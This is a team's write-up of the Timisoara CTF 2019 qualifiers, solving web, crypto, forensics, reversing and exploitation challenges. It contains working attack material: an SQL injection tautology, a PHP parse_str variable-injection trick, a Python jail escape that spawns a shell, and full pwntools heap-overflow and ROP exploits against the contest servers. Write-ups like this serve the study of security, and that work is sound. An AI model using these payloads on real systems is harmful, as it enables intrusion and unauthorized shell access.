Timisoara CTF 2019 Quals Write-up



Team : WTB
Ranked : 14
Point : 3576

MISC

Read the rules (1pt)
-------------------------------------------------------------------------------------------------------
Find the string "TIMCTF" on the homepage: TIMCTF{sometext}

WEB

Not so empty website (50pts)
-------------------------------------------------------------------------------------------------------
To get the flag, view the page source in the browser.
FLAG: TIMCTF{D0_not_b3_superfic1al}

Secret key of swag (150pts)
-------------------------------------------------------------------------------------------------------
In the source code of index.php:

parse_str($query);

Called with a single argument, parse_str() registers every key of the query string as a PHP variable of the same name, which has the same effect as extract($_GET). So I could set $processed_key directly from the URL with a query like ?action=login&processed_key=hax0r.
The flag is in an HTML comment in the page source.
FLAG: TIMCTF{Welcome_M4N_of_SW4G}

Admin panel (200pts)
-------------------------------------------------------------------------------------------------------
This is an SQL injection challenge: the password goes into the query unescaped, so a tautology logs in as admin.
Email : admin@admin
Password : ' or '1' = '1
FLAG: TIMCTF{SqL_1nj3ct1on_1s_b4ck_1n_town}

Crypto

Baby Crypto (50pts)
-------------------------------------------------------------------------------------------------------
Just undo the Caesar cipher.
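A brute force over all 25 shifts that picks the one producing the flag format is the quickest way to undo an unknown Caesar shift. The following is an added example, not the write-up's own solution; the challenge ciphertext is not reproduced on the page, so the sample input is constructed by shifting the known flag forward by 3.

```python
import string

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase


def caesar(text, shift):
    """Rotate A-Z and a-z by `shift` positions; digits, braces and '_' pass through unchanged."""
    out = []
    for ch in text:
        if ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) + shift) % 26])
        elif ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def crack_caesar(ciphertext, crib="TIMCTF{"):
    """Undo every possible shift and return (shift, plaintext) for each candidate containing the crib.

    The flag format is a known-plaintext crib: only the right shift turns six letters of the
    ciphertext back into TIMCTF, so exactly one hit is expected.
    """
    hits = []
    for shift in range(1, 26):
        candidate = caesar(ciphertext, -shift)
        if crib in candidate:
            hits.append((shift, candidate))
    return hits


# Constructed sample: the known flag shifted forward by 3. The real ciphertext from the
# challenge is not reproduced in the write-up, so this stands in for it.
SAMPLE = caesar("TIMCTF{Julius_Caesar_w0uld_b3_proud}", 3)

if __name__ == "__main__":
    print("ciphertext:", SAMPLE)
    for shift, plain in crack_caesar(SAMPLE):
        print("shift %d -> %s" % (shift, plain))
```

If the flag prefix is not known, drop the crib and print all 25 candidates; the readable one is obvious by eye.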
That gives the flag!
FLAG: TIMCTF{Julius_Caesar_w0uld_b3_proud}

Proof of work (100pts)
-------------------------------------------------------------------------------------------------------
I just brute-forced SHA-256 over increasing integers until a digest contained the required run of zeros. I ran it under pypy3, which is much faster than CPython for this kind of loop.

```python
import hashlib

TARGET = "0000000"


def sha256_hex(i):
    return hashlib.sha256(str(i).encode()).hexdigest()


i = 0
while True:
    digest = sha256_hex(i)
    # Prints every counter whose digest contains seven zeros anywhere (the check is a
    # substring match, not a prefix match); stop it by hand once a value passes the server.
    if TARGET in digest:
        print(str(i) + ": " + digest)
    i += 1
```

string : 365512095
FLAG: TIMCTF{9e13449f334ded947431aa5001c2e9ab429ab5ddf880f416fe352a96eb2af122}

Alien Alphabet (150pts)
-------------------------------------------------------------------------------------------------------
First, look at the last sentence: its glyph pattern matches the flag format (TIMCTF). So I assumed the alien characters map 1:1 onto English letters and ran a frequency analysis on the cipher. Then I predicted the text step by step ("?" marks a letter not yet known):

TIMCTF T?M??I? I? ?????M??M?    TIM? -> TIME
TIMCTF TEM??I?_I?_??E??ME       I guessed this one is S
TIMCTF TEM??IS_IS_??ES?ME       T?EME -> THEME
TIMCTF TEM?HIS_IS_??ES?ME       THE?E -> THERE, IT ? ?TF -> IT A CTF
TIMCTF TEM?HIS_IS_A?ES?ME       A?ES?ME -> AWESOME
TIMCTF TEM?HIS_IS_AWESOME

I guessed the last letter from the English word.
FLAG: TIMCTF{TEMPHIS_IS_AWESOME}

Password breaker (150pts)
-------------------------------------------------------------------------------------------------------
Stage 1: I ran a dictionary attack with John the Ripper, using rockyou.txt (the common password list) as the wordlist.
pass : johncena1234
Stage 2: I used the 'Advanced Archive Password Recovery' tool and brute-forced with A-Za-z0-9 plus special characters.
pass : bo$$
FLAG: TIMCTF{12345_is_A_bad_passw0rd}

TimCTF gambling service (200pts)
-------------------------------------------------------------------------------------------------------
The random seed is the current time.
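The write-up does not show the service's code, so the following is an added example (not the original solution) of why a time-based seed is fatal, under the assumption that the server does the usual srand(time(NULL)); rand() % N. It re-implements glibc's rand() so the number for any given second can be computed offline, which is the single-connection alternative to the race described next; the `predict_window` helper and the modulus are mine.

```python
import time

MOD31 = 2147483647  # 2**31 - 1, the modulus of glibc's seeding step


def glibc_rand_stream(seed, count):
    """Return the first `count` values glibc's rand() produces after srand(seed).

    glibc (TYPE_3 generator): r[0] = seed, r[1..30] = 16807 * r[i-1] mod (2**31 - 1),
    r[31..33] = r[0..2], then r[i] = r[i-31] + r[i-3] with 32-bit wrap-around. The first
    310 such sums are discarded and each output is the 32-bit sum shifted right by one.
    Seeds are taken modulo 2**32; values at or above 2**31 (not reachable from time()
    before 2038) are not handled, because glibc's seeding step differs for them.
    """
    seed &= 0xFFFFFFFF
    if seed == 0:  # srand(0) behaves like srand(1)
        seed = 1
    r = [0] * 34
    r[0] = seed
    for i in range(1, 31):
        r[i] = (16807 * r[i - 1]) % MOD31
    for i in range(31, 34):
        r[i] = r[i - 31]
    out = []
    for i in range(34, 344 + count):
        r.append((r[i - 31] + r[i - 3]) & 0xFFFFFFFF)
        if i >= 344:
            out.append(r[i] >> 1)
    return out


def predict_window(ts, slack, modulus, draws=1):
    """Candidate numbers for a server that did srand(t); rand() % modulus with t near ts.

    `slack` seconds either side covers clock skew and network latency; the attacker tries
    each candidate in turn (the write-up sidesteps this by racing two connections instead).
    """
    return {t: [v % modulus for v in glibc_rand_stream(t, draws)]
            for t in range(ts - slack, ts + slack + 1)}


if __name__ == "__main__":
    now = int(time.time())
    print("rand() after srand(%d): %s" % (now, glibc_rand_stream(now, 3)))
    print("guesses around now (mod 100):", predict_window(now, 1, 100))
```

The seed-1 outputs (1804289383, 846930886, ...) are the familiar numbers every C program prints when it calls rand() without srand(), which is a quick way to confirm the reimplementation against a real glibc.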
So I opened two connections at the same time, read the number from one and sent it to the other: both server processes were seeded with the same second, so they draw the same "random" number.

```python
from pwn import *

HOST, PORT = "89.38.208.143", 21023

# Two connections opened in the same second share the time-based seed, so the number
# the first one reveals is the number the second one expects.
p = remote(HOST, PORT)
p2 = remote(HOST, PORT)

p.recvuntil(": ")
p.sendline("1")
p2.recvuntil(": ")
p2.sendline("2")

n = p.recvline().strip()   # the number revealed by connection 1
p.close()

p2.sendline(n)
p2.interactive()
```

FLAG: TIMCTF{Now_You_c4N_ch3at_aT_pacanele}

Strange cipher (250pts)
-------------------------------------------------------------------------------------------------------
Just input ASCII characters and match the hex values. I tried a few inputs to see how each character maps, then solved it by hand. Eeeeeeeeasy.
FLAG: TIMCTF{Y0u_really_make_A_diff3rence}

Forensics

Deleted file (100pts)
-------------------------------------------------------------------------------------------------------
There are four steps.
Step 1. Open the file in HxD (a hex editor).
Step 2. Find the strings "PNG" and "IEND".
Step 3. Select the bytes from 9F0400 to 9FC2AF, copy them and save them as ???.png.
Step 4. Open the image and read the flag. Yeah!!!
FLAG: flag{I_s33_the_uns33n}

Strange image (100pts)
-------------------------------------------------------------------------------------------------------
john.png XOR 0x7a = the original PNG file.

```python
# john.png is the original PNG with every byte XORed with 0x7a; undo it byte by byte
with open("john.png", "rb") as fd:
    data = fd.read()

decoded = bytes(b ^ 0x7a for b in data)

with open("image.png", "wb") as fh:
    fh.write(decoded)
```

I uploaded the decoded image and found the string HATZ-fL4G: WLPFWI~Eudy3bm3kqxoh$. Rotating it gave {Brav0_j0hnule!
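Both forensics steps above lean on the fixed PNG signature. The following is an added example, not the write-up's code: it carves a PNG out of a larger blob by locating the signature and the IEND chunk (the Deleted file challenge), and it derives a single-byte XOR key by comparing the first eight bytes of a file against that signature instead of guessing 0x7a (the Strange image challenge). The challenge files are not reproduced on the page, so the sample blobs are constructed inline from a tiny valid PNG.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
IEND = b"IEND"


def carve_png(blob, start=0):
    """Return the first complete PNG in blob at or after `start`, or None.

    The image runs from the signature up to and including the IEND chunk's 4-byte CRC,
    which is why a hex-editor selection has to extend 4 bytes past the text "IEND".
    """
    sig = blob.find(PNG_SIG, start)
    if sig < 0:
        return None
    end = blob.find(IEND, sig)
    if end < 0:
        return None
    return blob[sig:end + len(IEND) + 4]


def recover_xor_key(data):
    """Derive a single-byte XOR key from the PNG signature; None if no one key fits all 8 bytes."""
    keys = {data[i] ^ PNG_SIG[i] for i in range(len(PNG_SIG))}
    return keys.pop() if len(keys) == 1 else None


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def png_chunk(ctype, body):
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


# Constructed 1x1 greyscale PNG (structurally valid) used as the hidden image below.
IHDR = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
IDAT = zlib.compress(b"\x00\x00")  # one scanline: filter byte + one pixel
TINY_PNG = PNG_SIG + png_chunk(b"IHDR", IHDR) + png_chunk(b"IDAT", IDAT) + png_chunk(b"IEND", b"")

DELETED_FILE_SAMPLE = b"\x00" * 64 + TINY_PNG + b"\xff" * 32  # PNG buried in unrelated bytes
STRANGE_IMAGE_SAMPLE = xor_bytes(TINY_PNG, 0x7A)               # every byte XORed with 0x7a

if __name__ == "__main__":
    carved = carve_png(DELETED_FILE_SAMPLE)
    print("carved %d bytes, signature ok: %s" % (len(carved), carved.startswith(PNG_SIG)))
    key = recover_xor_key(STRANGE_IMAGE_SAMPLE)
    print("xor key = %#x" % key)
    print("decoded matches original:", xor_bytes(STRANGE_IMAGE_SAMPLE, key) == TINY_PNG)
```

If recover_xor_key returns None the file is not a PNG under any single-byte key; try the other magic values you expect (ZIP's PK\x03\x04, JPEG's \xff\xd8) before assuming a longer key.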
The string is the flag shifted up by 3 in ASCII; shifting every printable character down by 3 gives TIMCTF{Brav0_j0hnule}, which is the flag.
FLAG: TIMCTF{Brav0_j0hnule}

Tri-color QR (200pts)
-------------------------------------------------------------------------------------------------------
Given a PNG file. Using Stegsolve, I found three different QR code images in the colour planes. Decoding them gives three parts of the flag.
part 1: TIMCTF{
part 2: Th1s_is_A
part 3: _4_part_
I also found a PK signature at the end of the hex data. I extracted it as a zip file and found the last part of the flag inside.
part 4: flag}
FLAG: TIMCTF{Th1s_is_A_4_part_flag}

Programming

Subset sum (200pts)
-------------------------------------------------------------------------------------------------------
I found that answering with just "1 <target sum>" (a one-element subset consisting of the target itself) passes the check, so the server does not verify that the chosen numbers actually come from the set. I scripted it to get the flag.

```python
from pwn import *

p = remote("89.38.208.143", 22021)
for i in range(0, 10):
    p.recvline()
    print(p.recvline())
    a = p.recvline().strip()   # the target sum for this round
    p.recvline()
    p.sendline(b"1 " + a)      # "one element, equal to the target" is accepted
p.interactive()
```

FLAG: TIMCTF{W3_like_t0_m33t_in_tHe_m1ddle}

Reverse Engineering

Math (150pts)
-------------------------------------------------------------------------------------------------------
Open the file in IDA.
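The solver script that follows reproduces the binary's encoder: every 3-byte group of the input (zero-padded at the end) is XORed with the 24-bit key 14335727 (0xdabeef) and emitted as four base64 digits, with no "=" padding. That transform is a bijection, so the target string can be decoded directly instead of guessed one character at a time. The decoder below is an added example, not the write-up's code; it also decodes the Strange jump target further down, which is the same scheme with key 0 (plain base64). The "=" handling mirrors the quirk in the solver's port, where a zero digit in the padded last group is written as "=".

```python
B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
MATH_KEY = 14335727  # 0xdabeef, the constant in the Math binary
MATH_TARGET = "jveimeqpofewqY3chceAr+G6tPqKiM27u/CLhcbX7MPv"
STRANGE_JUMP_TARGET = "VElNQ1RGe2RlQzNwdDF2ZV9FeGNlUDB0aTBuX2g0bmRMZXJ9"


def encode(plain, key):
    """Port of the encoder: pad to a multiple of 3 bytes, XOR each 24-bit group with key,
    then write the group as four base64 digits (no '=' padding)."""
    data = plain.encode() if isinstance(plain, str) else plain
    data += b"\x00" * (-len(data) % 3)
    out = []
    for i in range(0, len(data), 3):
        group = ((data[i] << 16) | (data[i + 1] << 8) | data[i + 2]) ^ key
        out.extend(B64[(group >> s) & 0x3F] for s in (18, 12, 6, 0))
    return "".join(out)


def decode(cipher, key):
    """Invert encode(): four digits -> 24-bit group -> XOR key -> 3 bytes; strip the zero padding."""
    if len(cipher) % 4:
        raise ValueError("cipher length must be a multiple of 4")
    out = bytearray()
    for i in range(0, len(cipher), 4):
        group = 0
        for ch in cipher[i:i + 4]:
            group = (group << 6) | (0 if ch == "=" else B64.index(ch))
        group ^= key
        out += bytes([(group >> 16) & 0xFF, (group >> 8) & 0xFF, group & 0xFF])
    return bytes(out).rstrip(b"\x00").decode()


if __name__ == "__main__":
    print("Math:        ", decode(MATH_TARGET, MATH_KEY))
    print("Strange jump:", decode(STRANGE_JUMP_TARGET, 0))
```

Because the key only affects bits inside each 3-byte group, a wrong key shows up immediately as garbage in the first four output characters, which is also how the brute force in the write-up is able to fix one group at a time.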
Copy the flag-encoding C code into Python and brute-force it (find a character, then raise the compare index x by hand and repeat).

```python
KEY = 14335727  # 0xdabeef, taken from the binary
B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
TARGET = "jveimeqpofewqY3chceAr+G6tPqKiM27u/CLhcbX7MPv"  # encoded flag from the binary, 44 chars


def encode(inp):
    """Python port of the binary's encoder: XOR each 3-byte group with KEY, then base64 it."""
    cipher = ["0"] * 44
    v7 = 0  # output index
    v5 = 0  # set when the input runs out mid-group (padding)
    for i in range(0, len(inp), 3):
        if i > len(inp) - 3:
            break
        v6 = KEY ^ (ord(inp[i + 2]) | ((ord(inp[i + 1]) | (ord(inp[i]) << 8)) << 8))
        for j in range(3):
            if i + j >= len(inp):
                v5 = 1
        for k in range(3, -1, -1):
            v4 = 0
            for l in range(5, -1, -1):
                if v6 & (1 << (6 * k + l)):
                    v4 |= 1 << l
            if v4:
                cipher[v7] = B64[v4]
            elif v5:
                cipher[v7] = "="
            else:
                cipher[v7] = "A"
            v7 += 1
    return "".join(cipher)


def solv(inp, q, p):
    cipher = encode(inp)
    x = 1  # compare index, raised by hand as characters are found
    if cipher[x] == TARGET[x] and cipher[x + 1] == TARGET[x + 1]:
        print(chr(q), p, cipher, TARGET)


# known = "TIMCTF{I_s33_you_UnDeRsTaNd_x86}"   # final result
known = "TIMCTF{"
for q in range(33, 127):
    for p in range(33, 127):
        solv(known + chr(q) + chr(p) + chr(p), q, p)
```

FLAG: TIMCTF{I_s33_you_UnDeRsTaNd_x86}

Pipes (200pts)
-------------------------------------------------------------------------------------------------------
This program creates child processes and communicates with them through a pipe.
The parent process passes the input value through the pipe to the child process.
The child process transforms the input it received from the parent.
The parent then reads the transformed value back from the pipe and compares it with the flag array.
In other words, if we reimplement the child's transformation and compare its output with the flag array, we can solve the problem by brute force.
This is the calculation logic in the child process: (screenshot)
And this is the flag array: (screenshot)
Solver C code (the rol function is taken from IDA and used as-is): (screenshot)
FLAG: TIMCTF{N0_n33d_for_piPe_if_there_is_N0_pIpEwEeD}

Strange jump (250pts)
-------------------------------------------------------------------------------------------------------
The main logic of this program is probably a decoy. Let's go step by step.
Ignore the code below and follow the handler function passed to signal().
Ignore the code above and follow sub_B9A, which is called from sub_1586.
We find sub_E9C, which is the real logic. I entered sub_E9C and gave the variables proper names.
Looking at the function, it is almost the same as Math. Copy the C code of sub_E9C into Python and brute-force it!
The script is almost the same as the Math one: there is no XOR key, the target is the base64 string from the binary, the compare index is y = 17 and three copies of the guessed character are appended.

```python
B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
TARGET = "VElNQ1RGe2RlQzNwdDF2ZV9FeGNlUDB0aTBuX2g0bmRMZXJ9"  # encoded flag from the binary, 48 chars


def encode(inp):
    """Python port of sub_E9C: same as Math, but without the XOR key."""
    cipher = ["0"] * 55
    v7 = 0  # output index
    v5 = 0  # set when the input runs out mid-group (padding)
    for i in range(0, len(inp), 3):
        if i > len(inp) - 3:
            break
        v6 = ord(inp[i + 2]) | ((ord(inp[i + 1]) | (ord(inp[i]) << 8)) << 8)
        for j in range(3):
            if i + j >= len(inp):
                v5 = 1
        for k in range(3, -1, -1):
            v4 = 0
            for l in range(5, -1, -1):
                if v6 & (1 << (6 * k + l)):
                    v4 |= 1 << l
            if v4:
                cipher[v7] = B64[v4]
            elif v5:
                cipher[v7] = "="
            else:
                cipher[v7] = "A"
            v7 += 1
    return "".join(cipher)


def solv(inp, q, p):
    cipher = encode(inp)
    y = 17  # compare index, raised by hand as characters are found
    if cipher[y] == TARGET[y] and cipher[y + 1] == TARGET[y + 1]:
        print(chr(q), p, cipher, TARGET)


# known = "TIMCTF{deC3pt1ve_ExceP0ti0n_h4ndLer}"   # final result
known = "TIMCTF{"
for q in range(33, 127):
    for p in range(33, 127):
        solv(known + chr(q) + chr(p) * 3, q, p)
```

FLAG: TIMCTF{deC3pt1ve_ExceP0ti0n_h4ndLer}

Baby Rev (50pts)
-------------------------------------------------------------------------------------------------------
Open the file in IDA; the flag is right there.
FLAG: TIMCTF{Wh0_know5_a5m_kn0ws_R3V}

Easy Rev (75pts)
-------------------------------------------------------------------------------------------------------
Open the file in IDA. You get the string TIMCTF{ebgngrq13synt}, but this is not the flag.
ebgngrq13synt -> rot13 -> rotated13flag
FLAG: TIMCTF{rotated13flag}

Exploit

Hiss hiss python (50pts)
-------------------------------------------------------------------------------------------------------
Pyjail. I got a shell with this payload: it walks from an empty dict to object, picks the subclass whose instances expose a module through _module, and reaches __import__ through that module's __builtins__ (the split string keeps the literal "__import__" out of the payload).

{}.__class__.__base__.__subclasses__()[59]()._module.__builtins__['__im'+'port__']('subprocess').call(["/bin/sh","-s"])

The index 59 depends on the interpreter version, since the order of __subclasses__() changes between releases; if it does not work, list the subclasses and look for the one with a _module attribute.
FLAG: TIMCTF{h1ss_h1ss_shell}

Swag (100pts)
-------------------------------------------------------------------------------------------------------
Open the file in IDA; the flag is in main.
FLAG: TIMCTF{1_am_th3_c00kie_m0nsta}

Bof-server (100pts)
-------------------------------------------------------------------------------------------------------
Open the file in IDA and get the stack address.
Exploit: shellcode + padding + stack address (the saved return address is overwritten with the address of the shellcode on the stack).
FLAG: TIMCTF{oooverfl0w}

Team Manager (300pts)
-------------------------------------------------------------------------------------------------------
Heap overflow. There are three steps.
Step 1. Add chunks 1 and 2, then edit chunk 1 so its comment overflows into chunk 2 and points chunk 2's comment at puts@got -> leak puts.
Step 2. Overwrite the pointer again, this time with free@got.
Step 3. Write system over free@got through that pointer, so free(players[v7]) becomes system(players[v7]); the skill fields are set to 0x6873 ("sh") so the struct starts with the string "sh".
Get shell:

```python
from pwn import *

# context.log_level = 'debug'
p = remote("89.38.208.144", 11114)
# p = process("./timctf_manager")
e = ELF("./timctf_manager")
# libc = ELF("./t_libc.so")

PUTS_OFF = 0x809c0     # libc.symbols['puts']
SYSTEM_OFF = 0x4f440   # libc.symbols['system']


def add(idx, name, ho, com):
    p.recv(1024)
    p.sendline("1")
    p.recvuntil("(1-4) ")
    p.sendline(str(idx))
    p.recvuntil("name: ")
    p.sendline(name)
    p.recvuntil("exploitation: ")
    p.sendline(ho)
    p.recvuntil("exploit: ")
    p.sendline("2")
    p.recvuntil("crypto: ")
    p.sendline("3")
    p.recvuntil("forensics: ")
    p.sendline("4")
    p.recvuntil("comment: ")
    p.sendline(com)


def delete(idx):
    p.recv(1024)
    p.sendline("2")
    p.recvuntil("(1-4) ")
    p.sendline(str(idx))


def edit(idx, name, com):
    p.recv(1024)
    p.sendline("3")
    p.recvuntil("(1-4) ")
    p.sendline(str(idx))
    p.recvuntil("name: ")
    p.sendline(name)
    # every skill becomes 0x6873 = "sh", so the struct begins with the string "sh"
    for prompt in ("exploitation: ", "exploit: ", "crypto: ", "forensics: "):
        p.recvuntil(prompt)
        p.sendline(str(0x6873))
    p.recvuntil("comment: ")
    p.sendline(com)


add(1, "AAAA", "0", "aaaa")
add(2, "BBBB", "0", "bbbb")

# Step 1: overflow chunk 1's comment into chunk 2 and point chunk 2's comment at puts@got
pay = b"A" * 256
pay += p64(0)
pay += p64(0x61)   # chunk 2 size field
pay += p64(0)
pay += p64(0)
pay += p64(e.got['puts'])
edit(1, "ABCD", pay)

p.sendline("4")    # show player 2 -> prints the contents of puts@got
p.recvuntil("(1-4) ")
p.sendline("2")
p.recvuntil("comment: ")
leak = u64(p.recv(6).ljust(8, b"\x00"))
print("leak = " + hex(leak))

libc_base = leak - PUTS_OFF
print("libc_base = " + hex(libc_base))
system = libc_base + SYSTEM_OFF
print("system = " + hex(system))

# Step 2: same overflow again, this time pointing chunk 2's comment at free@got
pay2 = b"C" * 256
pay2 += p64(0)
pay2 += p64(0x61)
pay2 += p32(0x10) + p32(0x20) + p32(16) + p32(16)
pay2 += p64(e.got['free'])
edit(1, "QWER", pay2)
delete(1)

# Step 3: editing player 2's comment now writes system over free@got; freeing player 2
# then calls system on the struct, which starts with "sh"
edit(2, p64(system), p64(system))
delete(2)

p.interactive()
```

FLAG: TIMCTF{Heap_overfl0ws_are_really_B4D}

Flag manager service (400pts)
-------------------------------------------------------------------------------------------------------
Between the format string bug and the stack overflow, I chose ROP.
libc leak -> return to main -> one_shot (magic gadget)

```python
from pwn import *

context.log_level = 'debug'
p = remote("89.38.208.144", 11115)
# p = process("./flag_manager01")
e = ELF("./flag_manager01")
# libc = ELF("./libc-2.27.so")

read_got = e.got['read']
puts_plt = e.plt['puts']
bss = e.bss()
binsh = b"/bin/sh\x00"
pr = 0x004008a3          # pop rdi ; ret
main = 0x4006d7

READ_OFF = 0x110070      # libc.symbols['read'] in libc-2.27
ONE_SHOT_OFF = 0x4f2c5   # one_gadget for libc-2.27 (0x45216 for libc-2.23)

p.recvuntil("name: ")

# Stage 1: 88 bytes of padding reach the saved return address; puts(read@got) leaks libc,
# then return to main for a second overflow
pay = b"A" * 88
pay += p64(pr) + p64(read_got) + p64(puts_plt)
pay += p64(main)
p.sendline(pay)
p.recvuntil(": ")
p.sendline("1234")
p.recvuntil("NOOOOOOOOO!\n\n")

leak = u64(p.recv(6) + b"\x00\x00")
print("leak = " + hex(leak))
libc_base = leak - READ_OFF
print("libc_base = " + hex(libc_base))
one_shot = libc_base + ONE_SHOT_OFF

# Stage 2: same overflow, return straight into the one_gadget
pay2 = b"A" * 88
pay2 += p64(one_shot)
p.sendline(pay2)

p.interactive()
```

FLAG : TIMCTF{d3v_fd_i5_sn3aky_backd00r}